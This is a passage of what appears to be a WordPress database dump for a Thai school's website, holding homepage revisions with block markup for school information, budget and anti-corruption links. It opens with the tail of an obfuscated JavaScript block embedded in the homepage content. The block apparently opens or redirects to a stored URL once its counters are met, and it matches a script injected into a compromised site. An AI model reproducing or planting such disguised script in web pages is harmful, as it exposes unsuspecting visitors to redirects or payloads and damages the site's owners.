_0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-07 11:49:55','2024-08-07 04:49:55','',14,'http://pakhaeng.ssk.in.th/?p=640',0,'revision','',0),
(641,1,'2024-08-07 11:59:44','2024-08-07 04:59:44','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift 